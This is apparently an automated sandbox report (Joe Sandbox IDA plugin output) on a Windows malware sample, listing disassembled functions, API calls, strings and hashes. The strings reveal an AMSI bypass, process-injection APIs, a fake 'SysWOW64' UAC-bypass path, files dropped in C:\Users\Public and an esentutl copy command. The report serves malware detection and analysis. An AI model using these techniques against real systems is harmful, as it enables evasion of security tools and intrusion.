Opcode Fuzzy Hash: 3775be3b5836d822c08ef953648adb294e402b05ac34e5bcae719b27254209dd
Instruction Fuzzy Hash: FC01F271288B04AEFB11EFA1DC2287FBBADE749B04B519835F505E2A80E6309A00C870

Function 02E88128 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02FDB7E0,02FDB824,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E886E9
ResumeThread.KERNEL32(00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8), ref: 02E88D33
CloseHandle.KERNEL32(00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,00000000,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380), ref: 02E88EB2

Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02EE7380,02E8B7B8,UacInitialize,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E892A4

Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67

Part of subcall function 02E7DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
Part of subcall function 02E7DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
Part of subcall function 02E7DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
Part of subcall function 02E7DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B

Part of subcall function 02E78338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4

ExitProcess.KERNEL32(00000000,OpenSession,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,Initialize,02EE7380,02E8B7B8,00000000,00000000,00000000,ScanString,02EE7380,02E8B7B8), ref: 02E8B2FA

Strings

GetProcessMemoryInfo, xrefs: 02E8A148
mssip32, xrefs: 02E8A192
Advapi, xrefs: 02E8A9B7, 02E8A9C6, 02E8A9D5, 02E8A9E4, 02E8AA20, 02E8AA2F, 02E8AA3E
sppwmi, xrefs: 02E8ADFC
CreateProcessAsUserW, xrefs: 02E8AA2A, 02E8AA48
bcrypt, xrefs: 02E8A2BD
NtCreateSection, xrefs: 02E8AF4A
NtOpenProcess, xrefs: 02E8928A
BCryptVerifySignature, xrefs: 02E8A2A6
NtOpenFile, xrefs: 02E8B0E2
I_QueryTagInformation, xrefs: 02E8923A
FlushInstructionCache, xrefs: 02E8ABD8
NtQueryVirtualMemory, xrefs: 02E8AEB1
advapi32, xrefs: 02E8923F
ScanBuffer, xrefs: 02E88529, 02E887F6, 02E8899C, 02E88B29, 02E88CBD, 02E88E3C, 02E890B3, 02E891AB, 02E895C7, 02E898A0, 02E89A39, 02E89C6F, 02E89D01, 02E8A039, 02E8A3D7, 02E8A906, 02E8B20C
Kernel32, xrefs: 02E8AA02, 02E8AA11, 02E8AA4D
spp, xrefs: 02E8A0F9, 02E8A12C, 02E8ADC9
NtAlertResumeThread, xrefs: 02E8A611
DlpGetArchiveFileTraceInfo, xrefs: 02E8A4B3
RetailTracerEnable, xrefs: 02E8A0AF
RtlCreateQueryDebugBuffer, xrefs: 02E8A6DD
MZP, xrefs: 02E89992
NtSetSecurityObject, xrefs: 02E89276
SetUnhandledExceptionFilter, xrefs: 02E8AC0B
NtQuerySystemInformation, xrefs: 02E8A976
MiniDumpWriteDump, xrefs: 02E8924E
NtQueryInformationThread, xrefs: 02E8AEE4
CryptSIPVerifyIndirectData, xrefs: 02E8A17B
EtwEventWrite, xrefs: 02E8B148
LdrLoadDll, xrefs: 02E8B049
endpointdlp, xrefs: 02E8A464, 02E8A497, 02E8A4CA, 02E8A4FD
VirtualProtect, xrefs: 02E8AB3F
NtWriteVirtualMemory, xrefs: 02E8B0AF
WriteVirtualMemory, xrefs: 02E8ABA5
RtlAllocateHeap, xrefs: 02E8A644, 02E8A6AA
EnumServicesStatusExW, xrefs: 02E8A9DF
SLLoadApplicationPolicies, xrefs: 02E89F08
ntdll, xrefs: 02E8922B, 02E8927B, 02E8928F, 02E8A628, 02E8A65B, 02E8A68E, 02E8A6C1, 02E8A6F4, 02E8AE95, 02E8AEC8, 02E8AEFB, 02E8AF2E, 02E8AF61, 02E8AF94, 02E8AFC7, 02E8AFFA, 02E8B02D, 02E8B060, 02E8B093, 02E8B0C6, 02E8B0F9, 02E8B12C, 02E8B15F
SxTracerGetThreadContextDebug, xrefs: 02E8A0E2, 02E8ADB2
VirtualAlloc, xrefs: 02E8AAD9
UacInitialize, xrefs: 02E8912F, 02E8954B
SLGetSLIDList, xrefs: 02E89EA2
RtlQueryProcessDebugInformation, xrefs: 02E8A9A3
SLGetEncryptedPIDEx, xrefs: 02E8AE4B
CreateProcessAsUserA, xrefs: 02E8AA1B
NtQuerySecurityObject, xrefs: 02E8AFE3
NtDeviceIoControlFile, xrefs: 02E8A985
kernel32, xrefs: 02E8AAF0, 02E8AB23, 02E8AB56, 02E8AB89, 02E8ABBC, 02E8ABEF, 02E8AC22
CreateProcessW, xrefs: 02E8AA0C
NtWaitForSingleObject, xrefs: 02E8A677
psapi, xrefs: 02E8A9F3
UacScan, xrefs: 02E8841C, 02E885A5, 02E886FE, 02E888A4, 02E88A31, 02E88BC5, 02E88D44, 02E88FBB, 02E89429, 02E89643, 02E89824, 02E899BD, 02E89BF3, 02E8AA63
SLIsGenuineLocalEx, xrefs: 02E89ED5
CreateProcessWithLogonW, xrefs: 02E8AA39
tquery, xrefs: 02E8A0C6
sppc, xrefs: 02E89E86, 02E89EB9, 02E89EEC, 02E89F1F, 02E8AE2F, 02E8AE62
LdrGetProcedureAddress, xrefs: 02E8B07C
EnumProcessModules, xrefs: 02E8A9EE
dbgcore, xrefs: 02E89253, 02E89267
VirtualAllocEx, xrefs: 02E8AB0C
NtQueryDirectoryFile, xrefs: 02E8A994
NtReadVirtualMemory, xrefs: 02E8AFB0
EnumServicesStatusA, xrefs: 02E8A9B2
C:\Windows\System32\, xrefs: 02E886B3
ScanString, xrefs: 02E8822C, 02E88498, 02E88F3F, 02E89331, 02E8971A, 02E89AFB, 02E89DF9, 02E8A1B4, 02E8A59B, 02E8A792, 02E8AD3C
OpenProcess, xrefs: 02E8AB72
NtOpenObjectAuditAlarm, xrefs: 02E89226
EnumServicesStatusW, xrefs: 02E8A9C1
NtOpenSection, xrefs: 02E8AF17
DlpCheckIsCloudSyncApp, xrefs: 02E8A480
CreateProcessA, xrefs: 02E8A9FD
MiniDumpReadDumpStream, xrefs: 02E89262
NtMapViewOfSection, xrefs: 02E8AF7D
SLGatherMigrationBlob, xrefs: 02E8AE18
psapi, xrefs: 02E8A15F
OpenSession, xrefs: 02E88134, 02E882A8, 02E88324, 02E88621, 02E8877A, 02E88920, 02E88AAD, 02E88C41, 02E88DC0, 02E88EC3, 02E89037, 02E892B5, 02E894A5, 02E89796, 02E8991C, 02E89B77, 02E89D7D, 02E89F41, 02E8A230, 02E8A2DF, 02E8A51F, 02E8A716, 02E8A80E, 02E8ACC0, 02E8B288
EtwEventWriteEx, xrefs: 02E8B115
DllGetClassObject, xrefs: 02E8A115, 02E8ADE5
EnumServicesStatusExA, xrefs: 02E8A9D0
DlpNotifyPreDragDrop, xrefs: 02E8A44D
NtAccessCheck, xrefs: 02E8B016
NtGetWriteWatch, xrefs: 02E8AE7E
Ntdll, xrefs: 02E8A97B, 02E8A98A, 02E8A999, 02E8A9A8
Initialize, xrefs: 02E881B0, 02E883A0, 02E893AD, 02E89FBD, 02E8A35B, 02E8A88A, 02E8AC44, 02E8B190
DlpGetWebSiteAccess, xrefs: 02E8A4E6
SLGetGenuineInformation, xrefs: 02E89E6F

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2769005614-3738268246
Opcode ID: 7d196204680c46157eaa31a909725559e1aaad1ad18e80bd8dfc69a46b04cde8
Instruction ID: ec7bab9ea24036e1d95b12a1c66174ed2319c9c4bd33747d3a7193346545a962
Opcode Fuzzy Hash: 7d196204680c46157eaa31a909725559e1aaad1ad18e80bd8dfc69a46b04cde8
Instruction Fuzzy Hash: 3B430934AC021D8BDB21FB64DC849EE73BAEB85344F50E1A5B04DEB254DA70AE91CF51

Function 02E83E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Part of subcall function 02E7DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
Part of subcall function 02E7DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
Part of subcall function 02E7DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
Part of subcall function 02E7DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,02E8BB30,00000000,00000000,02E8BB24,00000000,00000000), ref: 02E840CB

Part of subcall function 02E788B8: LoadLibraryW.KERNEL32(amsi), ref: 02E788C1
Part of subcall function 02E788B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E78920

Sleep.KERNEL32(000003E8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,000003E8,ScanBuffer,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E84277

Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6

Sleep.KERNEL32(00004E20,UacScan,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacInitialize,02EE7380,02E8B7B8), ref: 02E850EE

Part of subcall function 02E7DC04: RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
Part of subcall function 02E7DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
Part of subcall function 02E7DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61

Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67

Part of subcall function 02E785BC: WinExec.KERNEL32(?,?), ref: 02E78624

Strings

C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02E864AA
UacUninitialize, xrefs: 02E83E1E, 02E8463E, 02E84C94, 02E85377
C:\Users\Public\pha.exe, xrefs: 02E8551B
C:\\Windows \\SysWOW64\\, xrefs: 02E84822
ScanString, xrefs: 02E83F03, 02E849C8, 02E84E08, 02E84FFD, 02E855B8, 02E85752, 02E85A97, 02E85E5B, 02E864F2, 02E86CD8, 02E86E4F, 02E86F07
C:\Users\Public\alpha.exe, xrefs: 02E854E5
C:\Users\Public\CApha.exe, xrefs: 02E85500
/o, xrefs: 02E864C0
UacScan, xrefs: 02E83F7F, 02E840DC, 02E84288, 02E8440B, 02E845DC, 02E846BA, 02E8484F, 02E84D10, 02E85079, 02E853F3, 02E85B8F, 02E860FF, 02E862C4, 02E865EA, 02E866F7, 02E86955, 02E86A4D
IconIndex=, xrefs: 02E86DAD
[InternetShortcut], xrefs: 02E86D48
OpenSession, xrefs: 02E84158, 02E84304, 02E84487, 02E848CB, 02E84AC0, 02E84C18, 02E84F00, 02E8517B, 02E852FB, 02E85634, 02E857CE, 02E8596E, 02E85B13, 02E85C87, 02E85ED7, 02E85F8B, 02E86248, 02E86340, 02E867EF, 02E86AC9, 02E86C3D, 02E86DD3, 02E86F83
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02E843F5
.url, xrefs: 02E85D93
C:\Users\Public\, xrefs: 02E85D88, 02E86FF3
ScanBuffer, xrefs: 02E83FFB, 02E84202, 02E84380, 02E84503, 02E8457F, 02E84736, 02E84947, 02E84B3C, 02E84D8C, 02E84F7C, 02E851F7, 02E8546F, 02E856B0, 02E859EA, 02E85D03, 02E86083, 02E863BC, 02E86666, 02E8686B, 02E869D1, 02E86B45, 02E86BC1
/d , xrefs: 02E864B5
HotKey=, xrefs: 02E86EE1
lld.SLITUTEN, xrefs: 02E8480C
URL=file:", xrefs: 02E86D57
Initialize, xrefs: 02E85876, 02E85C0B, 02E86007, 02E861CC, 02E86438, 02E8656E, 02E86773
C:\\Users\\Public\\Libraries\\, xrefs: 02E8616F
UacInitialize, xrefs: 02E84A44, 02E84E84, 02E850FF, 02E8553C, 02E858F2, 02E85DDF

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2171786310-3926298568
Opcode ID: a9e34e86894794647165ff7120072a2f213f4cee8a58be1f79ea22c5ead93e70
Instruction ID: 3de22712990a58cc1214f0f199a25bf538df1717185f47e8ed0b9e2a1e87d348
Opcode Fuzzy Hash: a9e34e86894794647165ff7120072a2f213f4cee8a58be1f79ea22c5ead93e70
Instruction Fuzzy Hash: F4430C34AC015D8BDB20FB64DC84AAE73B6FB85344F50D1A6B44DAB294DB70AE81CF51

Function 02E7E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814

Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C,OpenSession,02EE7380), ref: 02E7ED6E
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C,OpenSession), ref: 02E7ED76
CloseHandle.KERNEL32(0000052C,00000000,00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C), ref: 02E7ED7F

Strings

ntdll, xrefs: 02E7EEC5, 02E7EED6
ScanString, xrefs: 02E7E76A, 02E7E90F, 02E7EAD7, 02E7ECFF
AmsiOpenSession, xrefs: 02E7E814
UacScan, xrefs: 02E7E6B8, 02E7E85D, 02E7E9F5, 02E7EC35, 02E7EE78
OpenSession, xrefs: 02E7E711, 02E7E8B6, 02E7EA66, 02E7EB97, 02E7EC8E, 02E7EDDA
Initialize, xrefs: 02E7EB48, 02E7ED8B
ScanBuffer, xrefs: 02E7EBE6, 02E7EE29
NtSetSecurityObject, xrefs: 02E7EEC0
)"C:\Users\Public\Libraries\lxsyrsiW.cmd" , xrefs: 02E7E7F1, 02E7E9B3
NtOpenProcess, xrefs: 02E7EED1
Amsi, xrefs: 02E7E825

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3475578485-1053911981
Opcode ID: cec04f9bb86ccbd3a1ed3edccd2fad6544d39d62e1d0521f5d427ee734439db0
Instruction ID: 5190c07c39ce277a59a60d45c4315246a055f8deff8fe81bfedeacc9e0c5a472
Opcode Fuzzy Hash: cec04f9bb86ccbd3a1ed3edccd2fad6544d39d62e1d0521f5d427ee734439db0
Instruction Fuzzy Hash: D2221334AC015D9BEB25FB64D885B9E73B6AF86340F14E0E1B008EB694DB70AE41CF55

Function 02E61724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02E617D0
Sleep.KERNEL32(0000000A,00000000), ref: 02E617E6

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5696ea8c00b72aa2f039e17a97b572c652d6e342860ec6db9d537f3580e7e291
Instruction ID: 135a629cc4d8985b340a3bb671702d5f8ba14b1785a1b4b441b40e9204f5785a
Opcode Fuzzy Hash: 5696ea8c00b72aa2f039e17a97b572c652d6e342860ec6db9d537f3580e7e291
Instruction Fuzzy Hash: ADB124B2AC02508FCB16CF69D488365BBE1EB86399F19D6ADE44D8F3C5C7709491CB90

Function 02E788B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02E788C1

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E78920

Strings

amsi, xrefs: 02E788BC
W, xrefs: 02E788CD
DllGetClassObject, xrefs: 02E788E6

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 53fee759976c1c66e5e7789e105d6b78038b3b31c3c80edd043caf095a851929
Instruction ID: 9e1dda18aa06637536486182e188e0bfb0d18b166088153fa2a90b9580f75400
Opcode Fuzzy Hash: 53fee759976c1c66e5e7789e105d6b78038b3b31c3c80edd043caf095a851929
Instruction Fuzzy Hash: CEF0445058C381B9E301E3748C49F4FBECD4B66264F04DA58B1E85A2D2D679D1059767

Function 02E61A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02E61FE4), ref: 02E61B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E61FE4), ref: 02E61B31

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 34e7ba96bed52c081241060124423e901482b311ed6898d429dc7ac57479b215
Instruction ID: 547207f9516a95ca36476ed9a4ed0f954339170dc462d1cf9db416702e110bbc
Opcode Fuzzy Hash: 34e7ba96bed52c081241060124423e901482b311ed6898d429dc7ac57479b215
Instruction Fuzzy Hash: 9351A071AC12418FDB16CF688988776BBE4AB46398F18D5AEE44CCF3C2D7709845CB91

